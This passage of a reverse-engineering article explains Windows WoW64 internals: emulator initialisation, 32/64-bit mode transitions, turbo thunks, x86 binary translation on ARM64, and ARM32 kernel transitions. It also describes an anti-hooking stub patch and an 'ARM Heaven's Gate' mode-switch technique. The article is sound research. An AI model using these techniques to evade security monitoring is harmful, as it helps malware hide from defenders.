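typedef export_fn (*lookup_fn)(const char *name);

/* Resolves every entry; fails only when a required export is missing. */
bool resolve_exports(export_entry *entries, size_t count, lookup_fn lookup)
{
    assert(entries != NULL && lookup != NULL);

    for (size_t i = 0; i < count; ++i) {
        entries[i].address = lookup(entries[i].name);
        if (entries[i].address == NULL && entries[i].required)
            return false;  /* a mandatory export is missing */
    }
    return true;
}

/* Made-up translator that exports only two of the names. */
void sample_export(void) {}

export_fn sample_lookup(const char *name)
{
    if (strcmp(name, "BTCpuProcessInit") == 0 ||
        strcmp(name, "BTCpuGetBopCode") == 0)
        return sample_export;
    return NULL;
}
```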

At the end of the ProcessInit function, wow64!Wow64ProtectMrdata(1) is called, making .mrdata non-writable again.

wow64!ThreadInit

  • wow64!ThreadInit
    • wow64!CpuThreadInit
      • NtCurrentTeb32()->WOW32Reserved = BTCpuGetBopCode()
      • emu!BTCpuThreadInit

ThreadInit does a little thread-specific initialization, such as:

  • Copying CurrentLocale and IdealProcessor values from 64-bit TEB into 32-bit TEB.
  • For non-WOW64_CPUFLAGS_SOFTWARE emulators, it calls CpuThreadInit, which:
    • Performs NtCurrentTeb32()->WOW32Reserved = BTCpuGetBopCode().
    • Calls emu!BTCpuThreadInit().
  • For WOW64_CPUFLAGS_SOFTWARE emulators, it creates an event, which is added into AlertByThreadIdEventHashTable and stored in NtCurrentTeb()->TlsSlots[18]. This event is used for special emulation of NtAlertThreadByThreadId and NtWaitForAlertByThreadId.

NOTE: The WOW64_CPUFLAGS_MSFT64 (1) or the WOW64_CPUFLAGS_SOFTWARE (2) flag is stored in the NtCurrentTeb()->TlsSlots[/* 10 */ WOW64_TLS_WOW64INFO], in the WOW64INFO.CpuFlags field. One of these flags is always set in the emulator’s BTCpuProcessInit function (mentioned in the section above):

  • wow64cpu.dll sets WOW64_CPUFLAGS_MSFT64 (1)
  • wowarmhw.dll sets WOW64_CPUFLAGS_MSFT64 (1)
  • xtajit.dll sets WOW64_CPUFLAGS_SOFTWARE (2)

x86 on x64

Entering 32-bit mode

  • ...
  • wow64!RunCpuSimulation
    • wow64cpu!BTCpuSimulate
      • wow64cpu!RunSimulatedCode

RunSimulatedCode runs in a loop and performs transitions into 32-bit mode either via:

  • jmp fword ptr[reg]: a “far jump” that changes not only the instruction pointer (RIP), but also the code segment register (CS). The 32-bit code segment is usually 0x23, while the 64-bit code segment is 0x33
  • synthetic “machine frame” and iret: used on every “state reset”

NOTE: Explanation of segmentation and “why does it work just by changing a segment register” is beyond scope of this article. If you’d like to know more about “long mode” and segmentation, you can start here.

Far jump is used most of the time for the transition, mainly because it’s faster. iret, on the other hand, is more powerful, as it can change CS, SS, EFLAGS, RSP and RIP all at once. The “state reset” occurs when WOW64_CPURESERVED.Flags has the WOW64_CPURESERVED_FLAG_RESET_STATE (1) bit set. This happens during an exception (see wow64!Wow64PrepareForException and wow64cpu!BTCpuResetToConsistentState). Also, this flag is cleared on every iteration of the emulation loop (using btr, bit-test-and-reset).
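In C terms, the choice between the two transitions boils down to a test-and-clear of the reset flag. The sketch below only models that decision: the function names and the transition_kind enum are hypothetical, and the 32-bit width used for the flags is an assumption, not the documented layout of WOW64_CPURESERVED.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define WOW64_CPURESERVED_FLAG_RESET_STATE 1u

typedef enum { TRANSITION_FAR_JUMP, TRANSITION_IRET } transition_kind;

/* Same effect as x86 `btr`: report the old bit and leave it cleared. */
bool test_and_reset(uint32_t *flags, uint32_t mask)
{
    assert(flags != NULL);

    bool was_set = (*flags & mask) != 0;
    *flags &= ~mask;
    return was_set;
}

/* Picks the transition for one iteration of the emulation loop. */
transition_kind choose_transition(uint32_t *flags)
{
    return test_and_reset(flags, WOW64_CPURESERVED_FLAG_RESET_STATE)
               ? TRANSITION_IRET
               : TRANSITION_FAR_JUMP;
}
```

Because the flag is cleared as part of the test, a pending state reset selects iret exactly once and later iterations fall back to the far jump.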

[Figure: Start of the RunSimulatedCode (x64)]

You can see the simplest form of switching into the 32-bit mode. Also, at the beginning you can see that TurboThunkDispatch address is moved into the r15 register. This register stays untouched during the whole RunSimulatedCode function. Turbo thunks will be explained in more detail later.

Leaving 32-bit mode

The switch back to the 64-bit mode is very similar — it also uses far jumps. The usual situation when code wants to switch back to the 64-bit mode is upon system call:

[Figure: NtMapViewOfSection (x64)]

The Wow64SystemServiceCall is just a simple jump to the Wow64Transition:

[Figure: Wow64SystemServiceCall (x64)]

If you remember, the Wow64Transition value is resolved by the wow64cpu!BTCpuGetBopCode function:

[Figure: BTCpuGetBopCode in wow64cpu.dll (x64)]

It selects either KiFastSystemCall or KiFastSystemCall2 based on the CpupSystemCallFast value.

The KiFastSystemCall looks like this (used when CpupSystemCallFast != 0):

  • [x86] jmp 33h:$+9 (jumps to the instruction below)
  • [x64] jmp qword ptr [r15+offset] (which points to CpupReturnFromSimulatedCode)

The KiFastSystemCall2 looks like this (used when CpupSystemCallFast == 0):

  • [x86] push 0x33
  • [x86] push eax
  • [x86] call $+5
  • [x86] pop eax
  • [x86] add eax, 12
  • [x86] xchg eax, dword ptr [esp]
  • [x86] jmp fword ptr [esp] (jumps to the instruction below)
  • [x64] add rsp, 8
  • [x64] jmp wow64cpu!CpupReturnFromSimulatedCode

Clearly, KiFastSystemCall is faster, so why isn’t it used every time?

It turns out that CpupSystemCallFast is set to 1 in the wow64cpu!BTCpuProcessInit function if the process is not executed with the ProhibitDynamicCode mitigation policy and if NtProtectVirtualMemory(&KiFastSystemCall, PAGE_EXECUTE_READ) succeeds.

This is because KiFastSystemCall is in a non-executable read-only section (W64SVC), while KiFastSystemCall2 is in a read-executable section (WOW64SVC).

But the actual reason why KiFastSystemCall is in a non-executable section by default and needs to be made executable manually is, honestly, unknown to me. My guess would be that it has something to do with relocations, because the address in the jmp 33h:$+9 instruction must be somehow resolved by the loader. But maybe I’m wrong. Let me know if you know the answer!

Turbo thunks

I hope you didn’t forget about the TurboThunkDispatch address hanging in the r15 register. This value is used as a jump-table:

[Figure: TurboThunkDispatch (x64)]

There are 32 items in the jump-table.

[Figure: TurboDispatchJumpAddressStart (x64)]

CpupReturnFromSimulatedCode is the first code that is always executed in the 64-bit mode when 32-bit to 64-bit transition occurs. Let’s recapitulate the code:

  • The stack is swapped
  • Non-volatile registers are saved
  • eax, which contains the encoded service table index and system call number, is moved into ecx
  • Its high word is obtained via ecx >> 16
  • The result is used as an index into the TurboThunkDispatch jump-table

You might be confused now, because few sections above we’ve defined the service number like this:

typedef struct _WOW64_SYSTEM_SERVICE
{
    USHORT SystemCallNumber : 12;
    USHORT ServiceTableIndex : 4;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

…therefore, after right-shifting this value by 16 bits we should always get 0, right?

It turns out, on x64, the WOW64_SYSTEM_SERVICE might be defined like this:

typedef struct _WOW64_SYSTEM_SERVICE
{
    ULONG SystemCallNumber : 12;
    ULONG ServiceTableIndex : 4;
    ULONG TurboThunkNumber : 5; // Can hold values 0 - 31
    ULONG AlwaysZero : 11;
} WOW64_SYSTEM_SERVICE, *PWOW64_SYSTEM_SERVICE;

Let’s examine a few WoW64 system calls:

NtMapViewOfSection (x64)
NtWaitForSingleObject (x64)
NtDeviceIoControlFile (x64)

Based on our new definition of WOW64_SYSTEM_SERVICE, we can conclude that:

  • NtMapViewOfSection uses turbo thunk with index 0 (TurboDispatchJumpAddressEnd)
  • NtWaitForSingleObject uses turbo thunk with index 13 (Thunk3ArgSpNSpNSpReloadState)
  • NtDeviceIoControlFile uses turbo thunk with index 27 (DeviceIoctlFile)
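The decoding above boils down to a few shifts and masks. Here is a minimal sketch in Python, assuming the guessed WOW64_SYSTEM_SERVICE layout from above; the helper name decode_wow64_service is made up for illustration. The only concrete value used is 0D0004h, which is what the NtWaitForSingleObject stub moves into eax.

```python
from collections import namedtuple

# Hypothetical helper type; the layout mirrors the guessed
# WOW64_SYSTEM_SERVICE bit-field (12 + 4 + 5 + 11 bits).
Wow64SystemService = namedtuple(
    "Wow64SystemService",
    ["system_call_number", "service_table_index", "turbo_thunk_number"],
)


def decode_wow64_service(eax):
    """Split the 32-bit value that a WoW64 system call stub loads into eax."""
    eax &= 0xFFFFFFFF
    return Wow64SystemService(
        system_call_number=eax & 0xFFF,         # bits 0..11
        service_table_index=(eax >> 12) & 0xF,  # bits 12..15
        turbo_thunk_number=(eax >> 16) & 0x1F,  # bits 16..20
    )


# NtWaitForSingleObject: mov eax, 0D0004h
service = decode_wow64_service(0x000D0004)
print(service.turbo_thunk_number)  # 13
```

A stub whose high word is 0 decodes to turbo thunk number 0, which is the TurboDispatchJumpAddressEnd case.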

Let’s finally explain “turbo thunks” properly.

Turbo thunks are an optimization of the WoW64 subsystem, specifically on Windows x64, that lets particular system calls never leave wow64cpu.dll: the conversion of parameters and the return value, as well as the syscall instruction itself, are performed entirely there. The set of functions that use turbo thunks reveals that they are usually very simple in terms of parameter conversion: they receive numerical values or handles.

The notation of Thunk* labels is as follows:

  • The number specifies how many arguments the function receives
  • Sp converts a parameter with sign-extension
  • NSp converts a parameter without sign-extension
  • ReloadState returns to 32-bit mode using iret instead of a far jump if WOW64_CPURESERVED_FLAG_RESET_STATE is set
  • QuerySystemTime, ReadWriteFile, DeviceIoctlFile, … are special cases

Let’s take the NtWaitForSingleObject and its turbo thunk Thunk3ArgSpNSpNSpReloadState as an example:

  • it receives 3 parameters
  • 1st parameter is sign-extended
  • 2nd parameter isn’t sign-extended
  • 3rd parameter isn’t sign-extended
  • it can switch to 32-bit mode using iret if WOW64_CPURESERVED_FLAG_RESET_STATE is set
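The notation is regular enough to be decoded mechanically. The sketch below is just my reading of the naming scheme described above, not something taken from wow64cpu.dll; the function name parse_thunk_label and the regular expression are assumptions, and the special-case labels (such as DeviceIoctlFile) are deliberately rejected.

```python
import re


def parse_thunk_label(label):
    """Decode a generic label such as 'Thunk3ArgSpNSpNSpReloadState'.

    Returns (argument count, list of per-argument conversions, reload flag).
    """
    match = re.fullmatch(r"Thunk(\d+)Arg((?:NSp|Sp)*)(ReloadState)?", label)
    if match is None:
        raise ValueError("not a generic Thunk* label: " + label)
    arg_count = int(match.group(1))
    # "Sp" = sign-extended, "NSp" = not sign-extended, in argument order.
    conversions = re.findall(r"NSp|Sp", match.group(2))
    reload_state = match.group(3) is not None
    return arg_count, conversions, reload_state


print(parse_thunk_label("Thunk3ArgSpNSpNSpReloadState"))
```

For the NtWaitForSingleObject thunk this yields 3 arguments with the conversions Sp, NSp, NSp and the ReloadState flag set, which matches the list above.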

When we cross-check this information with its function prototype, it makes sense:

NTSTATUS
NTAPI
NtWaitForSingleObject(
_In_ HANDLE Handle,
_In_ BOOLEAN Alertable,
_In_ PLARGE_INTEGER Timeout
);

The sign-extension of HANDLE makes sense: if we pass an INVALID_HANDLE_VALUE, which happens to be 0xFFFFFFFF (-1) in 32-bit code, we don’t want to convert it to 0x00000000FFFFFFFF, but to 0xFFFFFFFFFFFFFFFF.
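To make the difference between the two conversions concrete, here is a small Python sketch. The function names are mine; they only model what the Sp and NSp conversions do to a 32-bit value when it is widened to 64 bits.

```python
def zero_extend_32_to_64(value):
    """NSp-style conversion: the upper 32 bits become zero."""
    return value & 0xFFFFFFFF


def sign_extend_32_to_64(value):
    """Sp-style conversion: bit 31 is copied into the upper 32 bits."""
    value &= 0xFFFFFFFF
    if value & 0x80000000:
        value |= 0xFFFFFFFF00000000
    return value


INVALID_HANDLE_VALUE_32 = 0xFFFFFFFF  # (HANDLE)-1 in a 32-bit process

print(hex(zero_extend_32_to_64(INVALID_HANDLE_VALUE_32)))  # 0xffffffff
print(hex(sign_extend_32_to_64(INVALID_HANDLE_VALUE_32)))  # 0xffffffffffffffff
```

Ordinary small handle values have bit 31 clear, so both conversions give the same result for them.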

On the other hand, if the TurboThunkNumber is 0, the call will end up in TurboDispatchJumpAddressEnd, which in turn calls wow64!Wow64SystemServiceEx. You can consider this case the “slow path”.

Disabling Turbo thunks

On Windows x64, the Turbo thunk optimization can be actually disabled!

In one of the previous sections I talked about the ntdll32!NtWow64CallFunction64 and wow64!Wow64CallFunctionTurboThunkControl functions. As with any other NtWow64* function, NtWow64CallFunction64 is only available in the WoW64 ntdll.dll. This function can be called with an index of a WoW64 function in the Wow64FunctionDispatch64 table (shown earlier).

The function prototype might look like this:

typedef enum _WOW64_FUNCTION {
    Wow64Function64Nop,
    Wow64FunctionQueryProcessDebugInfo,
    Wow64FunctionTurboThunkControl,
    Wow64FunctionCfgDispatchControl,
    Wow64FunctionOptimizeChpeImportThunks,
} WOW64_FUNCTION;

NTSYSCALLAPI
NTSTATUS
NTAPI
NtWow64CallFunction64(
    _In_ WOW64_FUNCTION Wow64Function,
    _In_ ULONG Flags,
    _In_ ULONG InputBufferLength,
    _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
    _In_ ULONG OutputBufferLength,
    _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
    _Out_opt_ PULONG ReturnLength
    );

NOTE: This function prototype has been reconstructed with the help of the wow64!Wow64CallFunction64Nop function code, which just logs the parameters.

We can see that wow64!Wow64CallFunctionTurboThunkControl can be called with an index of 2. This function performs some sanity checks and then calls wow64cpu!BTCpuTurboThunkControl(*(ULONG*)InputBuffer).

wow64cpu!BTCpuTurboThunkControl then checks the input parameter.

  • If it’s 0, it patches every target of the jump table to point to TurboDispatchJumpAddressEnd (remember, this is the target that is called when WOW64_SYSTEM_SERVICE.TurboThunkNumber is 0).
  • If it’s non-0, it returns STATUS_NOT_SUPPORTED.

This means 2 things:

  • Calling wow64cpu!BTCpuTurboThunkControl(0) disables the Turbo thunks, and every system call ends up taking the “slow path”.
  • It is not possible to enable them back.
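The behavior just described can be modeled in a few lines. This is only a toy model in Python, not the real implementation: the table holds strings instead of code addresses, every name except TurboDispatchJumpAddressEnd is a placeholder, and returning STATUS_SUCCESS on the disable path is my assumption.

```python
TURBO_THUNK_COUNT = 32              # the jump table has 32 items
STATUS_SUCCESS = 0x00000000
STATUS_NOT_SUPPORTED = 0xC00000BB


def make_dispatch_table():
    """Build a stand-in jump table; only the name at index 0 is real."""
    table = ["TurboDispatchJumpAddressEnd"]
    table += ["PlaceholderThunk%d" % i for i in range(1, TURBO_THUNK_COUNT)]
    return table


def turbo_thunk_control(table, control):
    """Model of the described behavior: 0 disables, anything else is rejected."""
    if control != 0:
        return STATUS_NOT_SUPPORTED
    slow_path = table[0]
    for index in range(len(table)):
        table[index] = slow_path  # every thunk now takes the "slow path"
    # Assumption: success is reported as STATUS_SUCCESS.
    return STATUS_SUCCESS


table = make_dispatch_table()
turbo_thunk_control(table, 0)
print(table[13])  # TurboDispatchJumpAddressEnd
```

Because the original targets are overwritten and not saved anywhere in this model, there is nothing to restore them from, which mirrors the one-way nature of the real call.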

With all this in mind, we can achieve disabling Turbo thunks by this call:

#define WOW64_TURBO_THUNK_DISABLE 0
#define WOW64_TURBO_THUNK_ENABLE 1 // STATUS_NOT_SUPPORTED 🙁

ULONG ThunkInput = WOW64_TURBO_THUNK_DISABLE;
NTSTATUS Status;

Status = NtWow64CallFunction64(Wow64FunctionTurboThunkControl,
                               0,
                               sizeof(ThunkInput),
                               &ThunkInput,
                               0,
                               NULL,
                               NULL);

What might it be good for? I can think of 3 possible use cases:

  • If we deploy a custom wow64log.dll (explained earlier), disabling Turbo thunks guarantees that we will see every WoW64 system call in our wow64log!Wow64LogSystemService callback. We wouldn’t see such calls if the Turbo thunks were enabled, because they would take the “fast path” inside wow64cpu.dll, where the syscall would be executed.
  • If we decide to hook Nt* functions in the native ntdll.dll, disabling Turbo thunks guarantees that for each Nt* function called in ntdll32.dll, the corresponding Nt* function will be called in the native ntdll.dll. (This is basically the same point as the previous one.)

    NOTE: Keep in mind that this only applies to system calls, i.e. to Nt* or Zw* functions. Other functions are not forwarded from the 32-bit ntdll.dll to the 64-bit ntdll.dll. For example, if we hooked RtlDecompressBuffer in the native ntdll.dll of the WoW64 process, it wouldn’t be called on an ntdll32!RtlDecompressBuffer call. This is because the full implementation of the Rtl* functions is already in ntdll32.dll.

  • We can “harmlessly” patch the high word moved to eax in every WoW64 system call stub to 0. For example, we could see that in NtWaitForSingleObject there is mov eax, 0D0004h. If we patched the appropriate 2 bytes in that instruction so that it would become mov eax, 4h, the system call would still work. This approach can be used as an anti-hooking technique: if there’s a jump at the start of the function, the patch will break it. If there’s no jump, we just disable the Turbo thunk for this function.
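The last point can be sketched on raw bytes. The following Python snippet is an illustration that works on a copy of the stub bytes rather than on live process memory; the function name clear_turbo_thunk is hypothetical. It relies on the fact that mov eax, imm32 is encoded as the opcode B8 followed by the little-endian immediate.

```python
import struct

MOV_EAX_IMM32 = 0xB8  # x86 opcode of "mov eax, imm32"


def clear_turbo_thunk(stub):
    """Return a copy of the stub with the high word of the immediate zeroed."""
    if len(stub) < 5 or stub[0] != MOV_EAX_IMM32:
        # A hooked stub (e.g. one starting with a jmp) ends up here.
        raise ValueError("stub does not start with mov eax, imm32")
    (imm,) = struct.unpack_from("<I", stub, 1)
    patched = bytearray(stub)
    struct.pack_into("<I", patched, 1, imm & 0x0000FFFF)
    return bytes(patched)


original = bytes.fromhex("b804000d00")  # mov eax, 0D0004h
patched = clear_turbo_thunk(original)   # mov eax, 4h
print(patched.hex())  # b804000000
```

Only the last two bytes of the instruction change, which are the “appropriate 2 bytes” mentioned above.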

x86 on ARM64

Emulation of x86 applications on ARM64 is handled by actual binary translation. Instead of wow64cpu.dll, xtajit.dll (probably short for “x86 to ARM64 JIT”) is used for the emulation. As with other emulation DLLs, this DLL is native (ARM64).

The x86 emulation on Windows ARM64 also consists of other “XTA” components:

  • xtac.exe — XTA Compiler
  • XtaCache.exe — XTA Cache Service

Execution of x86 programs on ARM64 appears to go way beyond just emulation. It is also capable of caching already binary-translated code, so that the next execution of the same application should be faster. This cache is located in the Windows\XtaCache directory, which contains files named in the format FILENAME.EXT.HASH1.HASH2.mp.N.jc. These files are then mapped into the user-mode address space of the application. If you’re asking whether you can find actual ARM64 code in these files: indeed, you can.
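If you want to list which modules already have a cache entry, the file name format can be split from the right. This is a minimal Python sketch under the assumption that the format is exactly as written above; the function name and the example file name are made up, and I make no claim about what HASH1, HASH2 or N mean.

```python
def parse_xta_cache_name(file_name):
    """Split FILENAME.EXT.HASH1.HASH2.mp.N.jc into its parts."""
    # Splitting from the right keeps module names with extra dots intact.
    parts = file_name.rsplit(".", 5)
    if len(parts) != 6 or parts[3] != "mp" or parts[5] != "jc":
        raise ValueError("unexpected XtaCache file name: " + file_name)
    module, hash1, hash2, _, number, _ = parts
    return {"module": module, "hash1": hash1, "hash2": hash2, "n": number}


# Hypothetical file name, for illustration only.
print(parse_xta_cache_name("EXAMPLE.EXE.0123ABCD.89EF4567.mp.1.jc"))
```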

The whole “XTA” and its internals are not in the focus of this article, but they would definitely deserve a separate article.

Unfortunately, Microsoft doesn’t provide symbols for any of these xta* DLLs or executables. But if you’re feeling adventurous, you can find some interesting artifacts, like this array of structures inside xtajit.dll, which contains the name of each function and a pointer to it. There are thousands of items in this array:

BT functions (before) (ARM64)

With a simple Python script, we can mass-rename all functions referenced in this array:

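import idc  # IDAPython, legacy idc API names

begin = 0x01800A8C20
end = 0x01800B7B4F
struct_size = 24

ea = begin
while ea < end:
    # The cursor is advanced before each read, so the entry at `begin` is skipped.
    ea += struct_size
    # Offset 0 holds a pointer to the name, offset 8 holds the function pointer.
    name = idc.GetString(idc.Qword(ea))
    idc.MakeName(idc.Qword(ea + 8), name)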

I’d like to thank Milan Boháček for providing me this script.

BT functions (after) (ARM64)
BT translated function list (ARM64)

Windows\SyCHPE32 & Windows\SysWOW64

One thing you can observe on ARM64 is that Windows contains two folders used for x86 emulation. The difference between them is that SyCHPE32 contains a small subset of DLLs that are frequently used by applications, while the content of the SysWOW64 folder is nearly identical to the content of this folder on Windows x64.

The CHPE DLLs are not pure-x86 DLLs and not even pure-ARM64 DLLs. They are “compiled-hybrid-PE”s. What does it mean? Let’s see:

NtMapViewOfSection (CHPE) (ARM64)

After opening SyCHPE32\ntdll.dll, IDA will first tell us, unsurprisingly, that it cannot download a PDB for this DLL. Looking at a randomly chosen Nt* function, we can see that it doesn’t differ from what we would see in SysWOW64\ntdll.dll. Let’s look at some non-Nt* function:

RtlDecompressBuffer (CHPE) (ARM64)

We can see that it contains a regular x86 function prologue, immediately followed by an x86 function epilogue and then a jump to somewhere that looks like garbage.

My guess is that the reason for this prologue is compatibility with applications that check whether particular functions are hooked by checking if the first bytes of the function contain a real prologue.

NOTE: Again, if you’re feeling adventurous, you can patch the FileHeader.Machine field in the PE header to IMAGE_FILE_MACHINE_ARM64 (0xAA64) and open this file in IDA. You will see a whole lot of correctly resolved ARM64 functions. Again, I’d like to thank Milan Boháček for this tip.

If your question is “how are these images generated?”, I would answer that I don’t know, but my bet would be on some internal version of Microsoft’s C++ compiler toolchain. This idea appears to be supported by various occurrences of the CHPE keyword in the ChakraCore codebase.

ARM32 on ARM64

The loop inside wowarmhw!BTCpuSimulate is fairly simple compared to the wow64cpu.dll loop:

DECLSPEC_NORETURN
VOID
BTCpuSimulate(
    VOID
    )
{
    NTSTATUS Status;
    PCONTEXT Context;

    //
    // Gets WoW64 CONTEXT structure (ARM32) using
    // the RtlWow64GetCurrentCpuArea() function.
    //
    Status = CpupGetArmContext(&Context, NULL);
    if (!NT_SUCCESS(Status))
    {
        RtlRaiseStatus(Status);
        //
        // UNREACHABLE
        //
        return;
    }

    for (;;)
    {
        //
        // Switch to ARM32 mode and run the emulation.
        //
        NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = TRUE;
        CpupSwitchTo32Bit(Context);
        NtCurrentTeb()->TlsSlots[/* 2 */ WOW64_TLS_INCPUSIMULATION] = FALSE;

        //
        // When we get here, it means ARM32 code performed a system call.
        // Advance instruction pointer to skip the "UND 0F8h" instruction.
        //
        Context->Pc += 2;

        //
        // Set LSB (least significant bit) if ARM32 is executing in
        // Thumb mode.
        //
        if (Context->Cpsr & 0x20) {
            Context->Pc |= 1;
        }

        //
        // Let wow64.dll emulate the system call. R12 has the system call
        // number, Sp points to the stack which contains the system call
        // arguments.
        //
        Context->R0 = Wow64SystemServiceEx(Context->R12, Context->Sp);
    }
}

CpupSwitchTo32Bit does nothing more than save the whole CONTEXT, perform the SVC 0xFFFF instruction and then restore the CONTEXT.
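The program counter fix-up performed by the loop after each system call is easy to isolate. Below is a small Python model of just that step; the function name is mine, and 0x20 is the same CPSR mask (the Thumb bit) that the C code above tests.

```python
CPSR_THUMB_BIT = 0x20  # T bit of the ARM32 CPSR


def resume_pc_after_syscall(pc, cpsr):
    """Model of the Pc fix-up done after CpupSwitchTo32Bit returns."""
    # Skip the 2-byte instruction that triggered the transition.
    pc = (pc + 2) & 0xFFFFFFFF
    # In Thumb state, the least significant bit of the address is set.
    if cpsr & CPSR_THUMB_BIT:
        pc |= 1
    return pc


print(hex(resume_pc_after_syscall(0x1000, CPSR_THUMB_BIT)))  # 0x1003
print(hex(resume_pc_after_syscall(0x1000, 0)))               # 0x1002
```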

nt!KiEnter32BitMode / SVC 0xFFFF

I won’t be explaining here how system call dispatching works in the ntoskrnl.exe — Bruce Dang already did an excellent job doing it. This section is a follow up on his article, though.

The SVC instruction is the ARM64 counterpart of the SYSCALL instruction on x64: it basically enters kernel mode. There is a small difference between SYSCALL and SVC, though: while on Windows x64 the system call number is moved into the eax register, on ARM64 the system call number can be encoded directly into the SVC instruction.
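To show what “encoded directly into the instruction” means, here is a short Python sketch of the A64 SVC encoding, where the 16-bit immediate occupies bits 5..20 of the 32-bit instruction word. The function names are made up for illustration.

```python
SVC_BASE = 0xD4000001  # A64 encoding of "SVC #0"
SVC_MASK = 0xFFE0001F  # fixed bits of the SVC encoding


def encode_svc(imm16):
    """Return the 32-bit A64 instruction word for SVC #imm16."""
    if not 0 <= imm16 <= 0xFFFF:
        raise ValueError("immediate must fit in 16 bits")
    return SVC_BASE | (imm16 << 5)


def decode_svc(instruction):
    """Return the immediate of an A64 SVC instruction word."""
    if (instruction & SVC_MASK) != SVC_BASE:
        raise ValueError("not an SVC instruction")
    return (instruction >> 5) & 0xFFFF


print(hex(encode_svc(0xFFFF)))  # 0xd41fffe1
```

A kernel handler can therefore recover the immediate from the instruction word itself, without looking at any general-purpose register.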

SVC 0xFFFF (ARM64)

Let’s peek for a moment into the kernel to see how this SVC instruction is handled:

  • nt!KiUserExceptionHandler
    • nt!KiEnter32BitMode
KiUserExceptionHandler (ARM64)
KiEnter32BitMode (ARM64)

We can see that:

  • MRS X30, ELR_EL1: the current interrupt-return address (stored in the ELR_EL1 system register) is moved to the register X30 (link register, LR).
  • MSR ELR_EL1, X15: the interrupt-return address is replaced by the value in the register X15 (which is aliased to the instruction pointer register, PC, in 32-bit mode).
  • ORR X16, X16, #0b10000: bit [4] is set in X16, which is later moved to the SPSR_EL1 register. Setting this bit switches the execution mode to 32-bit.

Simply said, in the X15 register, there is an address that will be executed once we leave the kernel-mode and enter the user-mode — which happens with the ERET instruction at the end.

nt!KiExit32BitMode / UND #0xF8

Alright, we’re in the 32-bit ARM mode now, so how exactly do we leave? Windows solves this transition via the UND instruction, which is similar to the UD2 instruction on Intel CPUs. If you’re not familiar with it, you just need to know that it is an instruction that is guaranteed to raise an “invalid instruction” exception, which the OS kernel can handle. It is a defined “undefined instruction”. Again, there is a difference between UND and UD2: on ARM, a 1-byte immediate value can be encoded directly in the instruction.

Let’s look at the NtMapViewOfSection system call in the SysArm32\ntdll.dll:

NtMapViewOfSection (ARM64)

Let’s peek into the kernel again:

  • nt!KiUser32ExceptionHandler
    • nt!KiFetchOpcodeAndEmulate
      • nt!KiExit32BitMode
KiEnter32BitMode (ARM64)
KiEnter32BitMode (ARM64)

Keep in mind that while the 32-bit code is running, it cannot modify the value of the previously stored X30 register, because it is not visible in 32-bit mode. It stays there the whole time. Upon UND #0xF8 execution, the following happens:

  • the KiFetchOpcodeAndEmulate function moves the value of X30 into the X24 register (not shown in the screenshot).
  • AND X19, X16, #0xFFFFFFFFFFFFFFC0: bit [4] (among others) is cleared in the X19 register, which is later moved to the SPSR_EL1 register. Clearing this bit switches the execution mode back to 64-bit.
  • KiExit32BitMode then moves the value of the X24 register into the ELR_EL1 register. That means when this function finishes its execution, the ERET brings us back to the 64-bit code, right after the SVC 0xFFFF instruction.
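The two bit operations on the saved program status value (the ORR on entry and the AND on exit) can be modeled like this. It is only a sketch of the arithmetic in Python with names of my own choosing; it says nothing about the other SPSR_EL1 bits the kernel may touch.

```python
SPSR_AARCH32_BIT = 0b10000             # bit [4]: return to 32-bit state
EXIT_32BIT_MASK = 0xFFFFFFFFFFFFFFC0   # clears bits [5:0], including bit [4]


def enter_32bit(spsr):
    """Model of ORR X16, X16, #0b10000."""
    return spsr | SPSR_AARCH32_BIT


def exit_32bit(spsr):
    """Model of AND X19, X16, #0xFFFFFFFFFFFFFFC0."""
    return spsr & EXIT_32BIT_MASK


def returns_to_32bit(spsr):
    return bool(spsr & SPSR_AARCH32_BIT)


spsr = enter_32bit(0)
print(returns_to_32bit(spsr))              # True
print(returns_to_32bit(exit_32bit(spsr)))  # False
```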

NOTE: Windows uses the UND instruction for several purposes. A common example is UND #0xFE, which is used as a breakpoint instruction (the equivalent of __debugbreak() / int3).
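For completeness, here is how such an instruction looks in memory. The Python sketch below assumes the 16-bit Thumb encoding of the permanently undefined instruction (DE00h with the immediate in the low 8 bits), which is consistent with the 2-byte Pc adjustment in BTCpuSimulate; the function name is hypothetical.

```python
import struct

THUMB_UDF_BASE = 0xDE00  # 16-bit Thumb "undefined instruction" with imm8 = 0


def encode_thumb_und(imm8):
    """Return the little-endian bytes of the 16-bit Thumb UND #imm8."""
    if not 0 <= imm8 <= 0xFF:
        raise ValueError("immediate must fit in 8 bits")
    return struct.pack("<H", THUMB_UDF_BASE | imm8)


print(encode_thumb_und(0xF8).hex())  # f8de
print(encode_thumb_und(0xFE).hex())  # fede
```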

As you could spot, 3 kernel transitions are required for the emulation of a system call (SVC 0xFFFF, the system call itself, UND 0xF8). This is because on ARM there is no way to switch between 32-bit and 64-bit mode purely in user-mode.

If you’re looking for “ARM Heaven’s Gate”, this is it. Put whatever function address you like into the X15 register and execute SVC 0xFFFF. The next instruction will be executed in the 32-bit ARM mode, starting at that address. When you’d like to come back to 64-bit mode, simply execute UND #0xF8 and your execution will continue with the instruction following the SVC 0xFFFF.

Appendix

////////////////////////////////////////////////////////////////////////////////
// General definitions.
////////////////////////////////////////////////////////////////////////////////
//
// Context flags.
// winnt.h (Windows SDK)
//
#define CONTEXT_i386 0x00010000L
#define CONTEXT_AMD64 0x00100000L
#define CONTEXT_ARM 0x00200000L
#define CONTEXT_ARM64 0x00400000L
//
// Machine type.
// winnt.h (Windows SDK)
//
#define IMAGE_FILE_MACHINE_TARGET_HOST 0x0001 // Useful for indicating we want to interact with the host and not a WoW guest.
#define IMAGE_FILE_MACHINE_I386 0x014c // Intel 386.
#define IMAGE_FILE_MACHINE_ARMNT 0x01c4 // ARM Thumb-2 Little-Endian
#define IMAGE_FILE_MACHINE_AMD64 0x8664 // AMD64 (used by RtlpArchContextFlagFromMachine below)
#define IMAGE_FILE_MACHINE_ARM64 0xAA64 // ARM64 Little-Endian
#define IMAGE_FILE_MACHINE_CHPE_X86 0x3A64 // Hybrid PE (defined in ntimage.h (WDK))
////////////////////////////////////////////////////////////////////////////////
// ntoskrnl.exe
////////////////////////////////////////////////////////////////////////////////
typedef struct _PS_NTDLL_EXPORT_ITEM {
PCSTR RoutineName;
PVOID RoutineAddress;
} PS_NTDLL_EXPORT_ITEM, *PPS_NTDLL_EXPORT_ITEM;
